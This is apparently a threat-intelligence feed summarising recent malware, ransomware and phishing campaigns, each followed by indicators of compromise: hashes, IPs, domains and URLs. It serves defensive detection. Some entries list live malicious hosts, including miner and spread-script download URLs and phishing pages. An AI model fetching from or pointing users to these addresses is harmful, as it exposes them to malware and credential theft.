A new version of the Octo malware, named Octo2, has emerged as a significant threat to European banks. This variant builds upon the capabilities of its predecessor, which was already a dominant force in mobile malware. Octo2 features improved remote access capabilities, sophisticated obfuscation techniques, and a Domain Generation Algorithm (DGA) for communication with command and control servers. Initial campaigns have been observed in Italy, Poland, Moldova, and Hungary, targeting banking applications. The malware's developers have focused on enhancing stability for Device Takeover attacks and implementing advanced anti-detection measures. With the original Octo source code leaked, Octo2 represents an escalation in the mobile threat landscape, posing increased risks to mobile banking security worldwide.

Type	Indicator
FileHash-MD5	11cb1b221952268fcd6000e563752d79
FileHash-MD5	c508d432e3d521acaa6215934f609b2a
FileHash-MD5	e32eeea3676874431571f976d044a816
FileHash-SHA1	5e44ba99e81c6673b000519755e041c2d4082ae8
FileHash-SHA1	d40169c63e74d86cc0d02c638401bcd9ccdb621b
FileHash-SHA1	d4a85997999a975848b60fd52597538baf652daf
FileHash-SHA256	117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9
FileHash-SHA256	6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98
FileHash-SHA256	83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae

BlackSuit Ransomware

The report meticulously chronicles a sophisticated intrusion which began in December 2023 and culminated in the deployment of BlackSuit ransomware approximately 15 days later. The threat actor demonstrated an array of tactics, leveraging tools like Cobalt Strike, Sharphound, and SystemBC, alongside built-in Windows utilities, to establish a persistent foothold, exfiltrate data, and ultimately encrypt systems for financial gain. The investigation revealed the use of various obfuscation techniques, including process injection, proxy servers, and malleable command-and-control infrastructure, highlighting the actor's determination to evade detection.

Type	Indicator
FileHash-MD5	0bb61c0cff022e73b7c29dd6f1ccf0e2
FileHash-MD5	1b2b0fc8f126084d18c48b4f458c798b
FileHash-MD5	3900ebc7766f3894fb1eb300460376ad
FileHash-MD5	3bf1142b3294c23852852053135ec0df
FileHash-MD5	519dc779533b4ff0fc67727fecadba82
FileHash-MD5	6015e6e85d0d93e60041fa68c6a89776
FileHash-MD5	76a2363d509cc7174c4abee9a7d7ae68
FileHash-MD5	820cfde780306e759bb434da509f7a91
FileHash-MD5	b54240c98ca23202e58a1580135ad14c
FileHash-MD5	bed5688a4a2b5ea6984115b458755e90
FileHash-MD5	d66000edfed0a9938162b2b453ffa516
FileHash-MD5	ecc488e51fbb2e01a7aac2b35d5f10bd
FileHash-MD5	ed44877077716103973cbbebd531f38e
FileHash-MD5	f34d5f2d4577ed6d9ceec516c1f5a744
FileHash-SHA1	286588a50b9b128d07aa0f8851f2d7ee91dfa372
FileHash-SHA1	2bb6c8b6461edc49e22f3d0c7dc45904b2ed8a2b
FileHash-SHA1	4e38b98965a4d4756e6f4a8259df62cbca7de559
FileHash-SHA1	586ea19ea4776300962e20cfc9e7017a50888ecb
FileHash-SHA1	8dde03600a18a819b080a41effc24f42fa960a3e
FileHash-SHA1	a3b617eb4248aba34c28c48886116ac97e55e932
FileHash-SHA1	cd55256904f1964b90b51089b46f1a933fec3e8e
FileHash-SHA1	ceb8c699a57193aa3be2a1766b03050cde3c738a
FileHash-SHA1	e63732fb38d2e823348529a264b4c4718e0c0b4a
FileHash-SHA256	27e300fa67828d8ffd72d0325c6957ff54d2dc6a060bbf6fc7aa5965513468e0
FileHash-SHA256	3b873bc8c7ee12fe879ab175d439b5968c8803fbb92e414de39176e2371896b2
FileHash-SHA256	55cde638e9bcc335c79c605a564419819abf5d569c128b95b005b2f48ccc43c1
FileHash-SHA256	60dcbfb30802e7f4c37c9cdfc04ddb411060918d19e5b309a5be6b4a73c8b18a
FileHash-SHA256	6c884e4a9962441155af0ac8e7eea4ac84b1a8e71faee0beafc4dd95c4e4753f
FileHash-SHA256	9493b512d7d15510ebee5b300c55b67f9f2ff1dda64bddc99ba8ba5024113300
FileHash-SHA256	a39dc30bd672b66dc400f4633dfa4bdd289b5e79909c2e25e9c08b44d99b8953
FileHash-SHA256	e92912153cf82e70d52203a1a5c996e68b7753818c831ac7415aedbe6f3f007d
FileHash-SHA256	f474241a5d082500be84a62f013bc2ac5cde7f18b50bf9bb127e52bf282fffbf
domain	svchorst.com
hostname	as.regsvcast.com
hostname	qw.regsvcast.com
hostname	wq.regsvcast.com
hostname	zx.regsvcast.com

Analysis of the BlackJack group: techniques, tools, and similarities with Twelve

The report examines the BlackJack hacktivist group targeting Russian organizations, focusing on their tools, techniques, and connections to the Twelve group. BlackJack employs freely available software like the Shamoon wiper and LockBit ransomware. Significant overlaps with Twelve include similar malware samples, identical file paths, and shared tactics. Both groups use network directories for malware distribution and scheduled tasks for execution. The analysis reveals a potential unified cluster of hacktivist activity against Russian targets, with no financial motives but aiming to cause maximum damage through data encryption, deletion, and theft.

Type	Indicator
FileHash-MD5	39b91f5dfbbec13a3ec7cce670cf69ad
FileHash-MD5	5f88a76f52b470dc8e72bba56f7d7bb2
FileHash-MD5	646a228c774409c285c256a8faa49bde
FileHash-MD5	bf402251745df3f065ebe2ffdec9a777
FileHash-MD5	da30f54a3a14ad17957c88bf638d3436
FileHash-MD5	ed5815ddad8188c198e0e52114173cb6
FileHash-SHA1	19ec859708e58b1275ee1bdb48aa1966757266d0
FileHash-SHA256	535e0dbd97cb9ea66f375400b550dd3bcad0788a89fb46996a651053a2df07c3

Threat Actors leverage Docker Swarm and Kubernetes to mine cryptocurrency at scale

A new cryptojacking campaign targeting Docker Engine API has been discovered, with the ability to move laterally to Docker Swarm, Kubernetes, and SSH servers. The attackers exploit exposed Docker API endpoints to deploy cryptocurrency miners and additional malicious payloads. They utilize Docker Hub to host malicious images and leverage Docker Swarm's orchestration features for command and control purposes. The campaign employs various techniques for lateral movement, persistence, and evasion, including manipulating Docker Swarm, exploiting Kubernetes' kubelet API, and installing backdoors. While some indicators suggest a possible link to TeamTNT, there is insufficient evidence for definitive attribution.

Type	Indicator
URL	http://45.9.148.35/aws
IPv4	164.68.106.96
FileHash-MD5	e10e3934d7659e00cc7f47b569af9ff5
FileHash-SHA1	02b71d23d5b26008dfb54a52fc3160b9e7f1296c
FileHash-SHA256	c5391314ce789ff28195858a126c8a10a4f9216e8bd1a8ef71d11c85c4f5175c
FileHash-MD5	154c26c9ddc84930f2acd899cd182916
FileHash-MD5	b62ce36054a7e024376b98df7911a5a7
FileHash-SHA1	efc0142857d1d8ee454286fb1b4587dad6762e0c
FileHash-SHA256	0af1b8cd042b6e2972c8ef43d98c0a0642047ec89493d315909629bcf185dffd
FileHash-SHA256	2514e5233c512803eff99d4e16821ecc3b80cd5983e743fb25aa1bcc17c77c79
FileHash-SHA256	505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a
FileHash-SHA256	6157a74926cfd66b959d036b1725a63c704b76af33f59591c15fbf85917f76fa
FileHash-SHA256	6f426065e502e40da89bbc8295e9ca039f28b50e531b33293cee1928fd971936
FileHash-SHA256	700635abe402248ccf3ca339195b53701d989adb6e34c014b92909a2a1d5a0ff
FileHash-SHA256	78ebc26741fc6bba0781c6743c0a3d3d296613cc8a2bce56ef46d9bf603c7264
FileHash-SHA256	9d02707b895728b4229abd863aa6967d67cd8ce302b30dbcd946959e719842ad
FileHash-SHA256	d99bd3a62188213894684d8f9b4f39dbf1453cc7707bac7f7b8f484d113534b0
FileHash-SHA256	e4c4400a4317a193f49c0c53888ec2f27e20b276c2e6ee1a5fd6eacf3f2a0214
FileHash-SHA256	e6985878b938bd1fba3e9ddf097ba1419ff6d77c3026abdd621504f5c4186441
IPv4	192.155.94.199
IPv4	45.9.148.35
URL	http://192.155.94.199/sh/xmr.sh.sh
URL	http://solscan.live/bin/zgrab
URL	http://solscan.live/chimaera/sh/init.sh
URL	http://solscan.live/sh/init.sh
URL	https://solscan.live/aws.sh
URL	https://solscan.live/bin/64bit/xmrig
URL	https://solscan.live/bin/pnscan_1.12+git20180612.orig.tar.gz
URL	https://solscan.live/bin/xmr/x86_64
URL	https://solscan.live/bin/xmrig
URL	https://solscan.live/data/docker.container.local.spread.txt
URL	https://solscan.live/scan_threads.dat
URL	https://solscan.live/sh/init.sh
URL	https://solscan.live/sh/kube.lateral.sh
URL	https://solscan.live/sh/search.sh
URL	https://solscan.live/sh/setup_xmr.sh
URL	https://solscan.live/sh/spread_docker_local.sh
URL	https://solscan.live/sh/spread_kube_loop.sh
URL	https://solscan.live/sh/spread_ssh.sh
URL	https://solscan.live/sh/xmr.sh.sh
URL	https://solscan.live/so/xmrig.so
URL	https://solscan.live/upload.php
domain	borg.wtf
domain	solscan.live
hostname	x.solscan.live
URL	https://solscan.live/up/kube_in.php

Iranian backed group steps up phishing campaigns against Israel, U.S.

An Iranian government-backed threat group known as APT42 has significantly intensified its phishing campaigns targeting high-profile individuals in Israel and the United States over the past six months. The group, associated with Iran's Islamic Revolutionary Guard Corps, has focused on current and former government officials, political campaigns, diplomats, think tanks, NGOs, and academic institutions involved in foreign policy discussions. APT42's activities demonstrate a concerted effort to rapidly shift its operational priorities in line with Iran's political and military objectives.

Type	Indicator
FileHash-MD5	157284a93f3c5f488f4559db3537daea
FileHash-MD5	1cea34e748cc43cdc7724684cebf409f
FileHash-MD5	39556dc87f9a24405e73e6dd46d34bc7
FileHash-MD5	6c033c2cbeff71f7d17be4628c7e59f5
FileHash-MD5	b6f02f67e2b5d2c81bc502d24258a1d5
FileHash-SHA1	5a892c6cf26f90220d279d878206bf73f933f4dc
FileHash-SHA1	7e564f5f6bb98f629789565a737738ea66330f74
FileHash-SHA1	ca06b5b530c5c9fc09b12b1c8c48f8aeca4c3452
FileHash-SHA1	cce4761750a2549dc5bb7e377717dd4ea40420e5
FileHash-SHA1	e8ce99f3b7c5163fc8ab793a7dcfbe2cdf1a21a7
FileHash-SHA256	0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60
FileHash-SHA256	33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156
FileHash-SHA256	4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f
FileHash-SHA256	82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a
FileHash-SHA256	89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c
FileHash-SHA256	baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849
FileHash-SHA256	bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527
FileHash-SHA256	c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3
FileHash-SHA256	c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32
FileHash-SHA256	f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060
URL	http://check-pabnel-status.live/Gcollection/Password
URL	http://check-pabnel-status.live/Gcollection/Ref/CkliPwaM
URL	http://check-pabnel-status.live/Lcollection/Password
URL	http://check-pabnel-status.live/Lcollection/Ref/F53OQQkE
URL	http://checking-paneling.live/aliasauthG/Password
URL	http://checking-paneling.live/aliasauthG/autoref/vNSX6c2m
URL	http://click-choose-figured.cfd/Gallery/Password
URL	http://click-choose-figured.cfd/Gallery/Ref/FSaEM5gG
URL	http://panel-short-check.live/PhyfkFQX
URL	http://panel-short-check.live/ZZqt3LYD
URL	http://s3api.shop/api/
URL	http://sharedrive.webredirect.org/Khn/shoaGzA/cGNt/dMPaV/kvvhK
URL	http://short-ion-per.live/08EFNZ1
URL	http://smaaaal.cfd/Wp59tqKU
domain	accredit-navigation.online
domain	brookings.email
domain	check-pabnel-status.live
domain	checking-paneling.live
domain	click-choose-figured.cfd
domain	panel-short-check.live
domain	s3api.shop
domain	short-ion-per.live
domain	smaaaal.cfd
domain	understandingthewar.org
hostname	sharedrive.webredirect.org
hostname	visioneditor.loseyourip.com

Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz

Unit42 explores Sniper Dz, a popular phishing-as-a-service (PhaaS) platform targeting social media and online services. Over 140,000 phishing websites associated with Sniper Dz were identified in the past year. The platform offers an admin panel with phishing page catalogs, allowing users to host on Sniper Dz infrastructure or download templates. Surprisingly, services are free, likely because Sniper Dz collects stolen credentials. The platform uses public proxy servers to hide phishing content, obfuscates code, and employs centralized infrastructure for credential exfiltration and victim tracking. Sniper Dz abuses legitimate SaaS platforms, particularly Blogspot, and uses brand names or trends as keywords in hostnames. After credential theft, victims may be redirected to malicious advertisements or potentially unwanted applications.

Type	Indicator
URL	http://proxymesh.com/web/index.php
URL	http://raviral.com/host_style/style/js-track/track.js
URL	http://raviral.com/k_fac.php
domain	raviral.com
hostname	pro.riccardomalisano.com
URL	http://pro.riccardomalisano.com/about/z1to.html
URL	http://pro.riccardomalisano.com/about/z2to.html

Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware

A threat actor is targeting transportation and logistics companies in North America with malware campaigns. The actor uses compromised email accounts to inject malicious content into existing conversations, making messages appear legitimate. Campaigns primarily deliver Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2 malware. The actor employs Google Drive URLs, .URL files, and SMB for malware delivery, and recently adopted the 'ClickFix' technique. Campaigns are small-scale and highly targeted, with lures impersonating industry-specific software. The activity is believed to be financially motivated and aligns with a trend of sophisticated social engineering combined with commodity malware use in the cybercriminal landscape.

Type	Indicator
FileHash-MD5	1ce8e7f90707058eec8757de0deaa76e
FileHash-MD5	6bc398dba59c8d162ee858b7b199f81d
FileHash-SHA1	6fdb6f50f4ad693c64b72a76a970fc93916b3655
FileHash-SHA1	d2e45018a2428d8b7729a75836499a4f55cdbcdf
FileHash-SHA256	0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2
FileHash-SHA256	163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a
FileHash-SHA256	199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431
FileHash-SHA256	1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3
FileHash-SHA256	2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319
FileHash-SHA256	37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235
FileHash-SHA256	582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04
FileHash-SHA256	8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618
FileHash-SHA256	957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d
FileHash-SHA256	ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e
FileHash-SHA256	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
FileHash-SHA256	cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013
FileHash-SHA256	d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d
FileHash-SHA256	e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37
FileHash-SHA256	e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842
FileHash-SHA256	f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f
FileHash-SHA256	fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7
IPv4	185.217.197.84
IPv4	89.23.98.98
domain	ambccm.com
domain	ambcrrm.com
domain	idessit.com
domain	live-samsaratrucking.com

Analysis of APT-C-00 (OceanLotus) Double Loader and Related VMP Loader

The report discusses recent attacks by APT-C-00 (OceanLotus), a state-sponsored hacking group. It analyzes two types of loaders used in their 2024 campaigns: a double loader and a VMP-protected version. The double loader consists of two modules: an MSVC DLL for initial information gathering and a GoLang DLL for payload execution. The VMP loader is a protected version of the double loader, using VMProtect 3.XX x64 to enhance its resistance to analysis. Both loaders ultimately deploy CobaltStrike Beacon modules with different C2 servers. The report highlights the group's use of various programming languages and false flag operations to complicate attribution.

Type	Indicator
FileHash-MD5	2109479e62f3c45bab00768553b158b8
FileHash-MD5	26669891d83b8a706d2c0af91292247c
FileHash-MD5	4a8756b22029a88506744ab7864c9b83
FileHash-MD5	4ce5ea38c4d486bed7f6d9e9208133c6
FileHash-MD5	9ad37ce054ca1523d26bb49fbc80dff6
FileHash-MD5	d21c4b1c1db2c9f443c4ba271f738c91
IPv4	64.176.58.16

Kryptina RaaS - From Unsellable Cast-Off to Enterprise Ransomware

This analysis examines the evolution of Kryptina, a ransomware-as-a-service platform, from a free tool on public forums to being actively used in enterprise attacks under the Mallox ransomware family. In May 2024, a Mallox affiliate leaked staging server data, revealing their Linux ransomware was based on a modified version of Kryptina. The affiliate made superficial changes to source code and documentation, removing Kryptina branding but retaining core functionality. This adoption exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants. The report details the similarities and differences between the original Kryptina RaaS and the modified Mallox version, including encryption methods, ransom note templates, and configuration files.

Type	Indicator
FileHash-MD5	71efe7a21da183c407682261612afc0f
FileHash-SHA1	0f1aea2cf0c9f2de55d2b920618a5948c5e5e119
FileHash-SHA256	45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d
CVE	CVE-2024-21338
FileHash-MD5	1448ce8abc2f0184ec898d55f9c338b4
FileHash-MD5	193d2c42fea21defedbce498b5039272
FileHash-MD5	231478ff24055d5cdb5fbec36060c8ff
FileHash-MD5	4825f3a92780be4a285583b0f24fed99
FileHash-MD5	51d51696c7f3a0e3fba4b8ceab210bac
FileHash-MD5	5b0c1958a875c205951b88fd1c885900
FileHash-MD5	68785d476573955d50a3908dc18bf73b
FileHash-MD5	6bb2752ea73b4d6a5c33f543b5c29461
FileHash-MD5	779aa15cd6a8d416e7f722331d87f47b
FileHash-MD5	7f099845d8e6849d6ab4d64b546477d6
FileHash-MD5	846bb4f2cdbf9ed624ba2647c6b04101
FileHash-MD5	8d0fd41d35df82d3e7e2ff5c1747b87c
FileHash-MD5	af1d24091758f1e02d51dc5f5297c932
FileHash-MD5	b0770b7f24a436d256f2d58fc8581a18
FileHash-MD5	b5b20e03ae941e9f21c444bd50225c41
FileHash-MD5	be08c3e95df5992903a69e04cbab22e3
FileHash-MD5	e9e087c52b97c7a3e343642379829e0a
FileHash-SHA1	0b9d2895d29f7d553e5613266c2319e10afdda78
FileHash-SHA1	0bbd9a8ddbb68e2658ea4c0a4106c7406a392098
FileHash-SHA1	0de92527430dc0794694787678294509964422e6
FileHash-SHA1	0e83d023b9f6c34ab029206f1f11b3457171a30a
FileHash-SHA1	0f632f8e59b8c8b99241d0fd5ff802f31a3650cd
FileHash-SHA1	1379a1b08f938f9a53082150d53efadb2ad37ae5
FileHash-SHA1	16ec82ac2caf0c2e4812a636dbff4bd8ef84d5c3
FileHash-SHA1	21bacf8daa45717e87a39842ec33ad61d9d79cfe
FileHash-SHA1	262497702d6b7f7d4af73a90cb7d0e930f9ec355
FileHash-SHA1	29936b1aa952a89905bf0f7b7053515fd72d8c5c
FileHash-SHA1	2b3fc20c4521848f33edcf55ed3d508811c42861
FileHash-SHA1	341552a8650d2bdad5f3ec12e333e3153172ee66
FileHash-SHA1	43377911601247920dc15e9b22eda4c57cb9e743
FileHash-SHA1	55dc4541b72a804a7edf324d6a388569a68a2986
FileHash-SHA1	58552820ba2271e5c3a76b30bd3a07144232b9b3
FileHash-SHA1	5cf67c0a1fa06101232437bee5111fefcd8e2df4
FileHash-SHA1	66cab82b64fbb03fecf7ca7f9ed295404a9bfe2b
FileHash-SHA1	78c27c7ac1da97dc822b4af7be5f15d68f9c5e4f
FileHash-SHA1	88a039be03abc7305db724079e1a85810088f900
FileHash-SHA1	9050419cbecc88be7a06ea823e270db16f47c1ea
FileHash-SHA1	93ef3578f9c3db304a979b0d9d36234396ec6ac9
FileHash-SHA1	a1a8922702ffa8c74aba9782cca90c939dfb15bf
FileHash-SHA1	b07c725edb65a879d392cd961b4cb6a876e40e2d
FileHash-SHA1	b27d291596cc890d283e0d3a3e08907c47e3d1cc
FileHash-SHA1	b768ba3e6e03a77004539ae999bb2ae7b1f12c62
FileHash-SHA1	c20e8d536804cf97584eec93d9a89c09541155bc
FileHash-SHA1	c4d988135e960e88e7acfae79a45c20e100984b6
FileHash-SHA1	d46fbc4a57dce813574ee312001eaad0aa4e52de
FileHash-SHA1	d618a9655985c33e69a4713ebe39d473a4d58cde
FileHash-SHA1	d94f890a8c92cbce50d89da2792bcfc24894c004
FileHash-SHA1	dc3f98dded6c1f1e363db6752c512e01ac9433f3
FileHash-SHA1	ee3cd3a749f5146cf6d4b36ee87913c51b9bfe93
FileHash-SHA1	ef2565c789316612d8103056cec25f77674d78d1
FileHash-SHA1	f17d9b3cd2ba1dea125d2e1a4aeafc6d4d8f12dc
FileHash-SHA1	fbb89744bc9f65719bd5415dcf1ec9a74b24254e
FileHash-SHA256	175e20a7c8d54bfa6271de9d550c25c21e1c91aaf39aaa80779389fc8600d53f
FileHash-SHA256	23ba8078df63ebb313f2f2a2f24dab840e068ddd5cc54bb661db7d010954d2fc
FileHash-SHA256	2fdaee89b426fa3ee00f3e8d10ebf23f1de1562746e5ba2ee606443572190610
FileHash-SHA256	3b1b1beacd0925dcb27675c45f50574921181c097ab8004d18bc116e5a99bde0
FileHash-SHA256	694eeec46cfe1b7acd54cf95b307416be984a5238b3059cc3af446e74e28d889
FileHash-SHA256	9195ad1b5c2d4b20b12958224c6913b6a7929c3c4d2648a552aa7dc92da9143b
FileHash-SHA256	9f4c40c0d52291334d90455a64106f920ede3bda5c3f7d00b0933032b0f208d8
FileHash-SHA256	b7776fc59166d0fdafa0ff7ab867049512226b0d7302a3acd9532ab05e58d44b
FileHash-SHA256	c23c25621872ef6a5f6a04dc1caf283a5efb3e046f6f721e96f661d28e3e6280
FileHash-SHA256	c714df0154f2b6fc8a82aa35281836c664bd3fbf4be3efc7e8b5b94ac87fc0a6
FileHash-SHA256	cd0f87f7df534b0e29b2ffa5d02cdef0d7db29a67a316e143554eb1945d75e6c
FileHash-SHA256	e52a8d0337bae656b01cb76c03975ac3d75ac4984c028ba2a6531396dea6dddd
FileHash-SHA256	e6d4e65c45700dcedd2b5ed73734328500b5f5a016d79440d3611092475b9e6e
FileHash-SHA256	e9b9f425fa818899070f69d09d3a35d7ccc88de6ac98b2c8b02116f1b314bc78
FileHash-SHA256	ec1b3e6440b0fe1523295479fb18660aaac2f9f13a72145feebe07d60c2d9197
FileHash-SHA256	f4b64976d7dcb04466f0a89d81cd2eb158158c752c042ec248549415799965bf
FileHash-SHA256	ff5e8c23e622bdaf6fd608691e6c3da298b0bfe867b0d8d84d37d991b75a237c
IPv4	185.73.125.6
domain	docs.md
hostname	grovik71.theweb.place

How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections

The RansomHub ransomware, attributed to a group tracked as Water Bakunawa, employs sophisticated anti-EDR techniques to evade security solutions. Its attack chain includes exploiting vulnerabilities like Zerologon, using EDRKillShifter to disable endpoint protection, and employing various evasion scripts. The ransomware targets multiple industries and critical infrastructure sectors, using spear-phishing for initial access. It utilizes tools like NetScan for network reconnaissance and AnyDesk for command and control. The attackers exfiltrate sensitive data using rclone before encrypting files and demanding ransom. The evolving tactics of RansomHub highlight the need for advanced, multi-layered security strategies to protect against modern ransomware threats.

Type	Indicator
IPv4	82.147.85.52
FileHash-MD5	0cd57e68236aaa585af75e3be9d5df7d
FileHash-MD5	407dcc63e6186f7acada055169b08d81
FileHash-MD5	57556d30b4d1e01d5c5ca2717a2c8281
FileHash-MD5	676259a72f3f770f8ad20b287d62071b
FileHash-MD5	da3ba26033eb145ac916500725b7dfd5
FileHash-MD5	de8e14fdd3f385d7c6d34b181903849f
FileHash-MD5	f17ceae8c5066608b5c87431bac405a9
FileHash-MD5	ff1eff0e0f1f2eabe1199ae71194e560
FileHash-SHA1	189c638388acd0189fe164cf81e455e41d9629d6
FileHash-SHA1	2d3a95e91449a366ccf56177a4542cc439635768
FileHash-SHA1	2e89cf3267c8724002c3c89be90874a22812efc6
FileHash-SHA1	3b035da6c69f9b05868ffe55d7a267d098c6f290
FileHash-SHA1	4c0d755f42902559d16b73ccc4511897f7bbce94
FileHash-SHA1	5f2c7da181a0ef32df5b9c8a10ea5b3135489021
FileHash-SHA1	6764ddb2e5b18bf5d0c621f3078d7ac72865c1c3
FileHash-SHA1	77daf77d9d2a08cc22981c004689b870f74544b5
FileHash-SHA1	86cdb729094c013e411ac9b4c72485a55a629e5d
FileHash-SHA1	8de2d38d33294586b4758599fdf65f1a265e013b
FileHash-SHA1	bcdb721d5be41a9d61bee20a458ae748e023238f
FileHash-SHA1	de1241a592760cc1d850be8f41beebcd460b66ec
FileHash-SHA1	e187d58f59e0444f7ef9ddefec88d2b11b96e734
FileHash-SHA1	e38082ae727aeaef4f241a1920150fdf6f149106
FileHash-SHA256	2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009
FileHash-SHA256	30abbbeedeeb268435899a7697f7a72f37a38e60ae2430e09bc029c7a8aa7001
FileHash-SHA256	46ff164e066a3a88dad76cad25c6ea42c7da6890bcba3fa3ccd4c6e93a3272d0
FileHash-SHA256	869758de8334c2b201a07cfbfc0a903105a113080dde0355857de46b3eaae08e
FileHash-SHA256	b2a2e8e0795b2f69d96a48a49985fb67d22d1c6e8b40dadd690c299b9af970d4
FileHash-SHA256	bd70882f67da03836f372172f655456ce19f95878d70ec39fcc6c059f9ef4ca0
FileHash-SHA256	bfbbba7d18be1aa2e85390fa69a761302756ee9348b7343af6f42f3b5d0a939c
FileHash-SHA256	d9a8c4fc94655f47a127b45c71e426d0f2057b6faf78fb7b86ee2995f7def41d

ReadText34 Ransomware Incident

A ransomware attack was observed in September 2024, targeting an endpoint with limited visibility. The threat actor used stolen Administrator credentials to enable RDP and deploy malicious executables. They installed a vulnerable driver, TrueSight RogueKiller Antirootkit, to disable security applications. The ransomware, named ReadText34, utilized various techniques to disable system recovery and encrypt files. The attack involved the use of BianLian Go Trojan for command and control. File encryption was performed using the native Windows utility cipher.exe. A ransom note was left, threatening to release stolen data if not contacted within 72 hours. The incident highlights the importance of comprehensive endpoint monitoring, incident response planning, and attack surface reduction efforts.

Type	Indicator
FileHash-MD5	891202963430a4b1dea2dc5b9af01dc5
FileHash-SHA1	f7042cd7c363eb85fbb9d4b42b667de4acbff24e
FileHash-SHA256	8368925651fefcd85e0e73790082b9a69237fa66225f932c2a44014cc356acdc
FileHash-SHA256	90daac69da7201e4e081b59b61ca2a2116772318621c430f75c91a65e56ea085
FileHash-SHA256	ac66828fbdf661d67562da5afb7cc8f55d9a8739ab1524e775d5dcebfc4de069
IPv4	94.198.50.195
email	ithelp15@securitymy.name
email	ithelp15@yousheltered.com

Uncovering ICICI Phishing Campaign: New Fraud App Found

A malicious host mimicking ICICI Bank has been discovered, along with a fraudulent app disguised as ICICI Helpdesk. The phishing domain, cppcccare.com, is hosted on an ASN known for various malicious activities. The fraudulent app, named 'ICICI.apk', is detected as a Trojan Banker, Keylogger, and SMSspy. It's believed to have been operational since August 2024, with a falsely inflated download count of 500K+. The app's description matches other fraudulent apps, indicating a broader phishing campaign. The incident has been reported to the bank, hosting provider, and CERT-IN authorities. The article provides detailed technical information about the malicious domain and app, including file hashes and package details.

Type	Indicator
FileHash-MD5	df1e45aa0435509d552602ca1b84ccb6
FileHash-SHA1	bde9068c2deb1e3dcf9b7646dc8960dbea97d8b3
FileHash-SHA256	cd89b4cc7dc155f30db39e31b30894ed11f3fb6ad0fe5b2d014b123e333084c6
IPv4	77.37.34.191
domain	cppcccare.com

Behind the CAPTCHA: A Clever Gateway of Malware

A sophisticated infection chain dubbed ClickFix has been observed using fake CAPTCHA pages to distribute Lumma Stealer malware. The campaign targets multiple countries through two main vectors: cracked game download URLs and phishing emails impersonating GitHub. Users are tricked into executing malicious scripts copied to their clipboards, leading to malware installation. The attack employs multi-layered encryption and leverages mshta to bypass detection. Mitigation strategies include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of cyber threats.

Type	Indicator
FileHash-SHA256	b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624
FileHash-SHA256	cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54
FileHash-SHA256	632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c
FileHash-SHA256	19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a
FileHash-SHA256	d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207
FileHash-SHA256	bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55
FileHash-SHA256	fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511

Unmasking MuddyWater's Multiple RMM Software Attacks

MuddyWater, a threat group active since 2017, has been utilizing various Remote Monitoring and Management (RMM) software for attacks, particularly in the Middle East. Their tactics include spear-phishing emails with malicious attachments or links, leading to the installation of RMM tools like Atera Agent, ScreenConnect, Remote Utilities, N-Able, Syncro, and SimpleHelp. These legitimate tools are exploited to gain remote access and control over victim systems. The group's attacks are characterized by Arabic-language lures, use of file-sharing services, and a consistent deployment process. MuddyWater's activities primarily target government, military, and energy sectors, demonstrating sophisticated evasion techniques and a large arsenal of attack tools.

Type	Indicator
FileHash-MD5	04afff1465a223a806774104b652a4f0
FileHash-MD5	146cc3a1a68be349e70b79f9115c496b
FileHash-MD5	1e9a4e774b61acc8a6b35ee50417e661
